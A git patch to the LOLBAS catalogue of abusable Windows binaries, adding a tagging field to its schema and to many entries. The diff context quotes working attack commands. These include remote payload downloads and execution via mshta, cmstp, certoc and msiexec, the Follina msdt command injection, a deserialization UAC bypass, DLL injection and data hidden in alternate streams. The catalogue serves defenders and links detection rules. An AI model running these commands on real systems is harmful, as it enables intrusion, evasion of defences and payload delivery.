From ebbf08ec4d7121c0194e1b7cfbe1955ceee12c6d Mon Sep 17 00:00:00 2001 From: Wietze Date: Wed, 3 Apr 2024 16:53:36 +0100 Subject: [PATCH] Adding tags (closes #9, #318) (#362) * Adding various tags as a first iteration * Adding quotes * Adding 'Custom Format' properly * Updating to key:value pairs * Update template --- .github/workflows/gh-pages.yml | 1 + YML-Schema.yml | 8 ++++++++ YML-Template.yml | 2 ++ yml/OSBinaries/AppInstaller.yml | 4 +++- yml/OSBinaries/Certoc.yml | 4 ++-- yml/OSBinaries/Cmstp.yml | 4 ++++ yml/OSBinaries/ConfigSecurityPolicy.yml | 4 +++- yml/OSBinaries/Control.yml | 4 ++-- yml/OSBinaries/Cscript.yml | 4 ++-- yml/OSBinaries/Diantz.yml | 4 ++++ yml/OSBinaries/Dnscmd.yml | 4 ++-- yml/OSBinaries/Eventvwr.yml | 4 ++++ yml/OSBinaries/Expand.yml | 2 -- yml/OSBinaries/Extexport.yml | 4 ++-- yml/OSBinaries/Extrac32.yml | 4 ++++ yml/OSBinaries/IMEWDBLD.yml | 4 +++- yml/OSBinaries/Installutil.yml | 10 +++++++++- yml/OSBinaries/Jsc.yml | 4 ++++ yml/OSBinaries/Makecab.yml | 8 ++++++-- yml/OSBinaries/Mavinject.yml | 6 ++++-- yml/OSBinaries/Msbuild.yml | 4 ++++ yml/OSBinaries/Msdt.yml | 6 ++++++ yml/OSBinaries/Mshta.yml | 8 +++++++- yml/OSBinaries/Msiexec.yml | 6 ++++-- yml/OSBinaries/Netsh.yml | 4 ++-- yml/OSBinaries/Odbcconf.yml | 4 ++++ yml/OSBinaries/OfflineScannerShell.yml | 2 ++ yml/OSBinaries/Pcalua.yml | 4 ++-- yml/OSBinaries/Presentationhost.yml | 4 +++- yml/OSBinaries/PrintBrm.yml | 4 ++++ yml/OSBinaries/Rasautou.yml | 4 ++-- yml/OSBinaries/Regasm.yml | 8 ++++++-- yml/OSBinaries/Register-cimprovider.yml | 2 ++ yml/OSBinaries/Regsvcs.yml | 8 ++++++-- yml/OSBinaries/Rundll32.yml | 12 +++++++++--- yml/OSBinaries/Tar.yml | 6 ++++++ yml/OSBinaries/Vbc.yml | 6 ++++-- yml/OSBinaries/Wmic.yml | 4 ++-- yml/OSBinaries/Wscript.yml | 4 ++-- yml/OSBinaries/Wuauclt.yml | 6 +++--- yml/OSBinaries/Xwizard.yml | 4 +++- yml/OSLibraries/Advpack.yml | 4 ++++ yml/OSLibraries/Ieadvpack.yml | 2 ++ yml/OSLibraries/Scrobj.yml | 2 ++ yml/OSLibraries/Setupapi.yml | 4 ++++ yml/OSLibraries/Shell32.yml | 2 ++ yml/OSLibraries/Shimgvw.yml | 4 +++- yml/OSLibraries/Syssetup.yml | 4 ++++ yml/OSLibraries/Zipfldr.yml | 2 -- yml/OSScripts/CL_LoadAssembly.yml | 2 ++ yml/OSScripts/UtilityFunctions.yml | 2 ++ yml/OtherMSBinaries/AccCheckConsole.yml | 4 ++++ yml/OtherMSBinaries/Appvlp.yml | 2 -- yml/OtherMSBinaries/Bginfo.yml | 14 ++++++++++++-- yml/OtherMSBinaries/Coregen.yml | 7 ++++--- yml/OtherMSBinaries/Excel.yml | 4 +++- yml/OtherMSBinaries/MsoHtmEd.yml | 4 +++- yml/OtherMSBinaries/Mspub.yml | 4 +++- yml/OtherMSBinaries/Powerpnt.yml | 4 +++- yml/OtherMSBinaries/Procdump.yml | 8 ++++++-- yml/OtherMSBinaries/Te.yml | 3 +++ yml/OtherMSBinaries/Tracker.yml | 4 ++++ yml/OtherMSBinaries/Winword.yml | 6 +++--- yml/OtherMSBinaries/vsls-agent.yml | 2 ++ yml/OtherMSBinaries/vstest.console.yml | 2 ++ 65 files changed, 229 insertions(+), 66 deletions(-) diff --git a/.github/workflows/gh-pages.yml b/.github/workflows/gh-pages.yml index 039ba1b..c8c08b1 100644 --- a/.github/workflows/gh-pages.yml +++ b/.github/workflows/gh-pages.yml @@ -20,6 +20,7 @@ jobs: mv yml/OSBinaries yml/Binaries mv yml/OSLibraries yml/Libraries mv yml/OSScripts yml/Scripts + rm -r yml/HonorableMentions - name: Deploy to LOLBAS-Project.github.io repo uses: peaceiris/actions-gh-pages@v3 diff --git a/YML-Schema.yml b/YML-Schema.yml index 250392f..58234b2 100644 --- a/YML-Schema.yml +++ b/YML-Schema.yml @@ -57,6 +57,14 @@ mapping: "OperatingSystem": type: str required: true + "Tags": + type: seq + sequence: + - type: map + mapping: + regex;(^[A-Z]): + type: str + required: false "Full_Path": type: seq required: true diff --git a/YML-Template.yml b/YML-Template.yml index bae43db..a26b89a 100644 --- a/YML-Template.yml +++ b/YML-Template.yml @@ -13,6 +13,8 @@ Commands: Privileges: Required privs MitreID: T1055 OperatingSystem: Windows 10 1803, Windows 10 1703 + Tags: + - Key1: Value1 # Optional field for one or more tags - Command: The second command Description: Description of the second command Usecase: A description of the usecase diff --git a/yml/OSBinaries/AppInstaller.yml b/yml/OSBinaries/AppInstaller.yml index 3106002..c965bf8 100644 --- a/yml/OSBinaries/AppInstaller.yml +++ b/yml/OSBinaries/AppInstaller.yml @@ -5,12 +5,14 @@ Author: 'Wade Hickey' Created: 2020-12-02 Commands: - Command: start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw - Description: AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL and is saved in C:\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\ + Description: AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL and is saved in INetCache. Usecase: Download file from Internet Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 + Tags: + - Download: INetCache Full_Path: - Path: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\AppInstaller.exe Detection: diff --git a/yml/OSBinaries/Certoc.yml b/yml/OSBinaries/Certoc.yml index b505388..34b5c3f 100644 --- a/yml/OSBinaries/Certoc.yml +++ b/yml/OSBinaries/Certoc.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows Server 2022 + Tags: + - Execute: DLL - Command: certoc.exe -GetCACAPS https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-DllInjection.ps1 Description: Downloads text formatted files Usecase: Download scripts, webshells etc. @@ -21,8 +23,6 @@ Commands: Full_Path: - Path: c:\windows\system32\certoc.exe - Path: c:\windows\syswow64\certoc.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certoc_load_dll.yml - IOC: Process creation with given parameter diff --git a/yml/OSBinaries/Cmstp.yml b/yml/OSBinaries/Cmstp.yml index d46d598..903ec73 100644 --- a/yml/OSBinaries/Cmstp.yml +++ b/yml/OSBinaries/Cmstp.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.003 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Input: INF - Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. Usecase: Execute code hidden within an inf file. Execute code directly from Internet. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1218.003 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + Tags: + - Input: INF Full_Path: - Path: C:\Windows\System32\cmstp.exe - Path: C:\Windows\SysWOW64\cmstp.exe diff --git a/yml/OSBinaries/ConfigSecurityPolicy.yml b/yml/OSBinaries/ConfigSecurityPolicy.yml index 55e0059..c8aa121 100644 --- a/yml/OSBinaries/ConfigSecurityPolicy.yml +++ b/yml/OSBinaries/ConfigSecurityPolicy.yml @@ -12,12 +12,14 @@ Commands: MitreID: T1567 OperatingSystem: Windows 10 - Command: ConfigSecurityPolicy.exe https://example.com/payload - Description: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE) + Description: It will download a remote payload and place it in INetCache. Usecase: Downloads payload from remote server Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 + Tags: + - Download: INetCache Full_Path: - Path: C:\Program Files\Windows Defender\ConfigSecurityPolicy.exe - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe diff --git a/yml/OSBinaries/Control.yml b/yml/OSBinaries/Control.yml index acb3f9c..7f4e162 100644 --- a/yml/OSBinaries/Control.yml +++ b/yml/OSBinaries/Control.yml @@ -11,11 +11,11 @@ Commands: Privileges: User MitreID: T1218.002 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: DLL Full_Path: - Path: C:\Windows\System32\control.exe - Path: C:\Windows\SysWOW64\control.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules-emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_control_dll_load.yml diff --git a/yml/OSBinaries/Cscript.yml b/yml/OSBinaries/Cscript.yml index b73f756..129672d 100644 --- a/yml/OSBinaries/Cscript.yml +++ b/yml/OSBinaries/Cscript.yml @@ -11,11 +11,11 @@ Commands: Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: WSH Full_Path: - Path: C:\Windows\System32\cscript.exe - Path: C:\Windows\SysWOW64\cscript.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wscript_cscript_script_exec.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml diff --git a/yml/OSBinaries/Diantz.yml b/yml/OSBinaries/Diantz.yml index a701ecc..74ff612 100644 --- a/yml/OSBinaries/Diantz.yml +++ b/yml/OSBinaries/Diantz.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1564.004 OperatingSystem: Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1. + Tags: + - Type: Compression - Command: diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab Description: Download and compress a remote file and store it in a cab file on local machine. Usecase: Download and compress into a cab file. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1105 OperatingSystem: Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019 + Tags: + - Type: Compression Full_Path: - Path: c:\windows\system32\diantz.exe - Path: c:\windows\syswow64\diantz.exe diff --git a/yml/OSBinaries/Dnscmd.yml b/yml/OSBinaries/Dnscmd.yml index ce91519..27f0d01 100644 --- a/yml/OSBinaries/Dnscmd.yml +++ b/yml/OSBinaries/Dnscmd.yml @@ -11,11 +11,11 @@ Commands: Privileges: DNS admin MitreID: T1543.003 OperatingSystem: Windows server + Tags: + - Execute: DLL Full_Path: - Path: C:\Windows\System32\Dnscmd.exe - Path: C:\Windows\SysWOW64\Dnscmd.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml - IOC: Dnscmd.exe loading dll from UNC/arbitrary path diff --git a/yml/OSBinaries/Eventvwr.yml b/yml/OSBinaries/Eventvwr.yml index 286d68f..e0a46a3 100644 --- a/yml/OSBinaries/Eventvwr.yml +++ b/yml/OSBinaries/Eventvwr.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1548.002 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + Tags: + - Application: GUI - Command: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c calc > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe Description: During startup, eventvwr.exe uses .NET deserialization with %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews file. This file can be created using https://github.com/pwntester/ysoserial.net Usecase: Execute a command to bypass security restrictions that limit the use of command-line interpreters. @@ -18,6 +20,8 @@ Commands: Privileges: Administrator MitreID: T1548.002 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10 + Tags: + - Application: GUI Full_Path: - Path: C:\Windows\System32\eventvwr.exe - Path: C:\Windows\SysWOW64\eventvwr.exe diff --git a/yml/OSBinaries/Expand.yml b/yml/OSBinaries/Expand.yml index 1503986..0bd732d 100644 --- a/yml/OSBinaries/Expand.yml +++ b/yml/OSBinaries/Expand.yml @@ -28,8 +28,6 @@ Commands: Full_Path: - Path: C:\Windows\System32\Expand.exe - Path: C:\Windows\SysWOW64\Expand.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml diff --git a/yml/OSBinaries/Extexport.yml b/yml/OSBinaries/Extexport.yml index 2d18eeb..c75e30a 100644 --- a/yml/OSBinaries/Extexport.yml +++ b/yml/OSBinaries/Extexport.yml @@ -11,11 +11,11 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: DLL Full_Path: - Path: C:\Program Files\Internet Explorer\Extexport.exe - Path: C:\Program Files (x86)\Internet Explorer\Extexport.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extexport.yml - IOC: Extexport.exe loads dll and is execute from other folder the original path diff --git a/yml/OSBinaries/Extrac32.yml b/yml/OSBinaries/Extrac32.yml index bfcce17..ae46dbc 100644 --- a/yml/OSBinaries/Extrac32.yml +++ b/yml/OSBinaries/Extrac32.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Type: Compression - Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe Description: Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file. Usecase: Extract data from cab file and hide it in an alternate data stream. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Type: Compression - Command: extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt Description: Copy the source file to the destination file and overwrite it. Usecase: Download file from UNC/WEBDav diff --git a/yml/OSBinaries/IMEWDBLD.yml b/yml/OSBinaries/IMEWDBLD.yml index 3c71cfc..7803476 100644 --- a/yml/OSBinaries/IMEWDBLD.yml +++ b/yml/OSBinaries/IMEWDBLD.yml @@ -5,12 +5,14 @@ Author: 'Wade Hickey' Created: 2020-03-05 Commands: - Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://pastebin.com/raw/tdyShwLw - Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/[1]. or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/[1]. + Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to INetCache. Usecase: Download file from Internet Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 + Tags: + - Download: INetCache Full_Path: - Path: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe Detection: diff --git a/yml/OSBinaries/Installutil.yml b/yml/OSBinaries/Installutil.yml index 4351a0e..40d9a44 100644 --- a/yml/OSBinaries/Installutil.yml +++ b/yml/OSBinaries/Installutil.yml @@ -11,6 +11,9 @@ Commands: Privileges: User MitreID: T1218.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: DLL + - Input: Custom Format - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll Description: Execute the target .NET DLL or EXE. Usecase: Use to execute code and bypass application whitelisting @@ -18,13 +21,18 @@ Commands: Privileges: User MitreID: T1218.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: DLL + - Input: Custom Format - Command: InstallUtil.exe https://example.com/payload - Description: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE) + Description: It will download a remote payload and place it in INetCache. Usecase: Downloads payload from remote server Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Download: INetCache Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe diff --git a/yml/OSBinaries/Jsc.yml b/yml/OSBinaries/Jsc.yml index 2b56882..b4e7198 100644 --- a/yml/OSBinaries/Jsc.yml +++ b/yml/OSBinaries/Jsc.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: WSH - Command: jsc.exe /t:library Library.js Description: Use jsc.exe to compile JavaScript code stored in Library.js and output Library.dll. Usecase: Compile attacker code on system. Bypass defensive counter measures. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: WSH Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Jsc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe diff --git a/yml/OSBinaries/Makecab.yml b/yml/OSBinaries/Makecab.yml index de392e9..c65d52e 100644 --- a/yml/OSBinaries/Makecab.yml +++ b/yml/OSBinaries/Makecab.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Type: Compression - Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file. Usecase: Hide data compressed into an alternate data stream @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Type: Compression - Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab Description: Download and compresses the target file and stores it in the target file. Usecase: Download file and compress into a cab file @@ -25,11 +29,11 @@ Commands: Privileges: User MitreID: T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Type: Compression Full_Path: - Path: C:\Windows\System32\makecab.exe - Path: C:\Windows\SysWOW64\makecab.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_alternate_data_streams.yml - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml diff --git a/yml/OSBinaries/Mavinject.yml b/yml/OSBinaries/Mavinject.yml index 61d5411..33e2aa7 100644 --- a/yml/OSBinaries/Mavinject.yml +++ b/yml/OSBinaries/Mavinject.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.013 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: DLL - Command: Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll" Description: Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172 Usecase: Inject dll file into running process @@ -18,11 +20,11 @@ Commands: Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: DLL Full_Path: - Path: C:\Windows\System32\mavinject.exe - Path: C:\Windows\SysWOW64\mavinject.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml - IOC: mavinject.exe should not run unless APP-v is in use on the workstation diff --git a/yml/OSBinaries/Msbuild.yml b/yml/OSBinaries/Msbuild.yml index 7aa009d..62d95ff 100644 --- a/yml/OSBinaries/Msbuild.yml +++ b/yml/OSBinaries/Msbuild.yml @@ -25,6 +25,8 @@ Commands: Privileges: User MitreID: T1127.001 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: DLL - Command: msbuild.exe project.proj Description: Execute jscript/vbscript code through XML/XSL Transformation. Requires Visual Studio MSBuild v14.0+. Usecase: Execute project file that contains XslTransformation tag parameters @@ -32,6 +34,8 @@ Commands: Privileges: User MitreID: T1127.001 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: WSH - Command: msbuild.exe @sample.rsp Description: By putting any valid msbuild.exe command-line options in an RSP file and calling it as above will interpret the options as if they were passed on the command line. Usecase: Bypass command-line based detections diff --git a/yml/OSBinaries/Msdt.yml b/yml/OSBinaries/Msdt.yml index 2704db8..ed0a601 100644 --- a/yml/OSBinaries/Msdt.yml +++ b/yml/OSBinaries/Msdt.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Application: GUI - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file. Usecase: Execute code bypass Application whitelisting @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Application: GUI - Command: msdt.exe /id PCWDiagnostic /skip force /param "IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(calc).exe" Description: Executes arbitrary commands using the Microsoft Diagnostics Tool and leveraging the "PCWDiagnostic" module (CVE-2022-30190). Note that this specific technique will not work on a patched system with the June 2022 Windows Security update. Usecase: Execute code bypass Application allowlisting @@ -25,6 +29,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Application: GUI Full_Path: - Path: C:\Windows\System32\Msdt.exe - Path: C:\Windows\SysWOW64\Msdt.exe diff --git a/yml/OSBinaries/Mshta.yml b/yml/OSBinaries/Mshta.yml index dfb40b3..8a3de9f 100644 --- a/yml/OSBinaries/Mshta.yml +++ b/yml/OSBinaries/Mshta.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.005 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: WSH - Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https://webserver/payload.sct"")")) Description: Executes VBScript supplied as a command line argument. Usecase: Execute code @@ -32,13 +34,17 @@ Commands: Privileges: User MitreID: T1218.005 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 (Does not work on 1903 and newer) + Tags: + - Execute: WSH - Command: mshta.exe https://example.com/payload - Description: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE) + Description: It will download a remote payload and place it in INetCache. Usecase: Downloads payload from remote server Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Download: INetCache Full_Path: - Path: C:\Windows\System32\mshta.exe - Path: C:\Windows\SysWOW64\mshta.exe diff --git a/yml/OSBinaries/Msiexec.yml b/yml/OSBinaries/Msiexec.yml index b6dacef..2e69f24 100644 --- a/yml/OSBinaries/Msiexec.yml +++ b/yml/OSBinaries/Msiexec.yml @@ -25,6 +25,8 @@ Commands: Privileges: User MitreID: T1218.007 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: DLL - Command: msiexec /z "C:\folder\evil.dll" Description: Calls DLLUnregisterServer to un-register the target DLL. Usecase: Execute dll files @@ -32,6 +34,8 @@ Commands: Privileges: User MitreID: T1218.007 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: DLL - Command: msiexec /i "https://trustedURL/signed.msi" TRANSFORMS="https://evilurl/evil.mst" /qb Description: Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a Transformfile will be used, which can contains malicious code or binaries. The /qb will skip user input. Usecase: Install trusted and signed msi file, with additional attack code as Treansorm file, from remote server @@ -42,8 +46,6 @@ Commands: Full_Path: - Path: C:\Windows\System32\msiexec.exe - Path: C:\Windows\SysWOW64\msiexec.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_web_install.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_masquerading.yml diff --git a/yml/OSBinaries/Netsh.yml b/yml/OSBinaries/Netsh.yml index 3caa274..0689edd 100644 --- a/yml/OSBinaries/Netsh.yml +++ b/yml/OSBinaries/Netsh.yml @@ -11,11 +11,11 @@ Commands: Privileges: Admin MitreID: T1546.007 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: DLL Full_Path: - Path: C:\WINDOWS\System32\Netsh.exe - Path: C:\WINDOWS\SysWOW64\Netsh.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_netsh_helper_dll_persistence.yml - Splunk: https://github.com/splunk/security_content/blob/2b87b26bdc2a84b65b1355ffbd5174bdbdb1879c/detections/endpoint/processes_launching_netsh.yml diff --git a/yml/OSBinaries/Odbcconf.yml b/yml/OSBinaries/Odbcconf.yml index abb45d7..7720e70 100644 --- a/yml/OSBinaries/Odbcconf.yml +++ b/yml/OSBinaries/Odbcconf.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.008 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: DLL - Command: | odbcconf INSTALLDRIVER "lolbas-project|Driver=c:\test\test.dll|APILevel=2" odbcconf configsysdsn "lolbas-project" "DSN=lolbas-project" @@ -20,6 +22,8 @@ Commands: Privileges: User MitreID: T1218.008 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: DLL - Command: odbcconf -f file.rsp Description: Load DLL specified in target .RSP file. See the Code Sample section for an example .RSP file. Usecase: Execute dll file using technique that can evade defensive counter measures diff --git a/yml/OSBinaries/OfflineScannerShell.yml b/yml/OSBinaries/OfflineScannerShell.yml index 68b8919..ba48008 100644 --- a/yml/OSBinaries/OfflineScannerShell.yml +++ b/yml/OSBinaries/OfflineScannerShell.yml @@ -11,6 +11,8 @@ Commands: Privileges: Administrator MitreID: T1218 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: DLL Full_Path: - Path: C:\Program Files\Windows Defender\Offline\OfflineScannerShell.exe Detection: diff --git a/yml/OSBinaries/Pcalua.yml b/yml/OSBinaries/Pcalua.yml index 9da2358..8a8ee40 100644 --- a/yml/OSBinaries/Pcalua.yml +++ b/yml/OSBinaries/Pcalua.yml @@ -18,6 +18,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + Tags: + - Execute: DLL - Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java Description: Open the target .CPL file with the Program Compatibility Assistant. Usecase: Execution of CPL files @@ -27,8 +29,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\pcalua.exe -Code_Sample: - - Code: Detection: - Sigma: 